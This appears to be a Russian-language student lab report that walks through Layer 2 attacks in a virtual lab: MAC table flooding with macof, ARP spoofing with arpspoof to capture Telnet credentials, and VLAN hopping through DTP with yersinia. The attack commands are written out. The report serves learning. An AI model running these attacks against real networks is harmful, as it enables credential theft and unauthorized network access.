# :memo: Практическая работа №2. L2. Основные атаки на L2 ## :memo:Часть 1. Переполнение таблицы коммутации. 1.1 Установим на kali linux необходимую утилиту. apt update ![](https://i.imgur.com/uUqkWdw.png) apt install dsniff -y ![](https://i.imgur.com/jxVsymB.png) 1.2 Включим атаку и через несколько секунд остановим её с помощью ctrl+c. macof ![](https://i.imgur.com/4YMMxed.png) 1.3 Увидим, что таблица коммутации switch7 переполнена. ![](https://i.imgur.com/NGLFJ4G.png) ## :memo: Часть 2. Arp-Spoofing. 2.1 Установим на Win7 Telnet ![](https://i.imgur.com/7zuouVW.png) 2.2 Проверим, может ли win7 подключаться по telnet к switch7/ ![](https://i.imgur.com/aivGCBR.png) ![](https://i.imgur.com/O4gbsoJ.png) 2.3 Настроим kali для атаки. Изменим параметры маршрутизации. Раскомментируем строку и сохраним файл. ![](https://i.imgur.com/4zEp1Sw.png) 2.4 Применим изменения. ![](https://i.imgur.com/6zuWbTx.png) 2.5 Начнём атаку. arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100 ![](https://i.imgur.com/WwVDrzs.png) 2.6 Обнаружили с помощью Wireshark в трафике TELNET аутентификационные данные пользователя. ![](https://i.imgur.com/ZKAbUs5.png) ![](https://i.imgur.com/xvfANMu.png) ![](https://i.imgur.com/6mSK7Fe.png) ![](https://i.imgur.com/oWfDZag.png) ## :memo: Часть 3. VLAN hopping 3.1 Поместим win10 в vlan10. Switch7(config)#int e1/2 Switch7(config-if)#switchport mode access Switch7(config-if)#no shutdown ![](https://i.imgur.com/4o85o4X.png) 3.2 Сконфигурируем trunk port на switch7. Switch7(config)#int e0/0 Switch7(config-if)#switchport trunk encapsulation dot1q Switch7(config-if)#switchport mode trunk ![](https://i.imgur.com/yOUVWIj.png) 3.3 Настроим на роутере шлюз для vlan 10/ Router(config)#int e0/1.10 Router(config-subif)#encapsulation dot1q 10 Router(config-subif)#ip address 192.168.10.1 255.255.255.0 ![](https://i.imgur.com/7omNfVn.png) После этих настроек Kali и Win10 будут доступны по сети, но трафик между ними будет проходить через маршрутизацию роутером. Используем атаку VLAN hopping, чтобы получить доступ в рамках широковещательного домена из Kali до win10. ![](https://i.imgur.com/zkSY7Cu.png) 3.4 Установим yersinia. apt install yersinia -y ![](https://i.imgur.com/pcvUSQv.png) 3.5 Подготовим интерфейсы Kali и запустим yersinia. root@kali:# modprobe 8021q root@kali:# vconfig add eth0 10 root@kali:# ifconfig eth0.10 up yersinia -G ![](https://i.imgur.com/b1b5zNS.png) 3.6 Проведем атаку на протокол DTP. Проделаем следующее: Launch attack -> DTP -> Enable trunking -> OK. Результат выполнения представлен ниже. ![](https://i.imgur.com/mXCZSgy.png) Командой "show int e0/1 trunk" посмотрим настройки порта в switch7. Было: ![](https://i.imgur.com/1hYOjrR.png) Стало: ![](https://i.imgur.com/NwzIETV.png) Трафик Wireshark с порта e0/1 на switch7. Трафик с vlan id 10 найден. ![](https://i.imgur.com/nYL4Xtq.png)